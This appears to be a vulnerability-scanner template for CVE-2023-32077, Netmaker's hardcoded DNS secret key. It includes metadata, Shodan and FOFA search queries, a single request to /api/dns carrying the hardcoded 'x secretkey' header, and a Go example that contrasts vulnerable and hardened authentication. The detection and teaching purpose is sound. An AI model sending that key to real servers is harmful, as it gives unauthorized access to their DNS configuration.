Vulnerability Description
Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, Netmaker used a hardcoded DNS secret key, which allows unauthenticated users to interact with DNS API endpoints.
id: CVE-2023-32077
info:
  name: Netmaker - Hardcoded DNS Secret Key
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
  impact: |
    Unauthenticated attackers can access DNS API endpoints using the hardcoded secret key, potentially manipulating DNS configurations and redirecting WireGuard network traffic in the Netmaker VPN infrastructure.
  remediation: |
    Update Netmaker to version 0.17.1 or 0.18.6 or later that removes hardcoded credentials and implements proper authentication for DNS API endpoints.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-32077
    cwe-id: CWE-798,CWE-321
    epss-score: 0.84662
    epss-percentile: 0.99301
    cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gravitl
    product: netmaker
    shodan-query:
      - html:"netmaker"
      - http.html:"netmaker"
    fofa-query: body="netmaker"
  tags: cve,cve2023,info-key,netmaker,exposure,gravitl,vuln
http:
  - method: GET
    path:
      - "{{BaseURL}}/api/dns"
    headers:
      Authorization: "x secretkey"
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")'
        condition: and
# digest: 4a0a0047304502205e571a0d70e1a274ea98bdac78485b855a34d87cbef276946867af78e84738c5022100a5c4ade7c4863834766609844c9e7a533eb7a9efa699984db8569b506b1af392:922c64590222798bb761d5b6d8e72950
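The defect class behind this template (CWE-798) next to a hardened check, as an added example that is not Netmaker's code and not part of the original template. The function names, the 32-character minimum and the sample secret are assumptions made for illustration; only the header value comes from the template.

```go
package main

import (
	"crypto/subtle"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Hypothetical built-in secret (CWE-798); the value is the one the template sends.
const hardcodedKey = "secretkey"

// tokenFrom returns the token of "<scheme> <token>", or "" if malformed.
// The scheme is not checked in this sketch.
func tokenFrom(r *http.Request) string {
	if p := strings.Fields(r.Header.Get("Authorization")); len(p) == 2 {
		return p[1]
	}
	return ""
}

// vulnerableAuth ignores configuration and accepts the compiled-in key.
func vulnerableAuth(_ string, r *http.Request) bool {
	return tokenFrom(r) == hardcodedKey
}

// hardenedAuth needs an operator-supplied secret, fails closed when it is short
// (32 is an assumed minimum) or equal to the old default, and compares in constant time.
func hardenedAuth(configured string, r *http.Request) bool {
	if len(configured) < 32 || configured == hardcodedKey {
		return false
	}
	return subtle.ConstantTimeCompare([]byte(tokenFrom(r)), []byte(configured)) == 1
}

// allowed runs one constructed GET /api/dns request through an auth check.
func allowed(auth func(string, *http.Request) bool, key, header string) bool {
	req := httptest.NewRequest(http.MethodGet, "/api/dns", nil)
	req.Header.Set("Authorization", header)
	return auth(key, req)
}

func main() {
	key := "0123456789abcdef0123456789abcdef" // constructed sample secret
	fmt.Println(allowed(vulnerableAuth, key, "x secretkey")) // true: built-in key accepted
	fmt.Println(allowed(hardenedAuth, key, "x secretkey"))   // false: rejected
	fmt.Println(allowed(hardenedAuth, key, "Bearer "+key))   // true: configured secret accepted
}
```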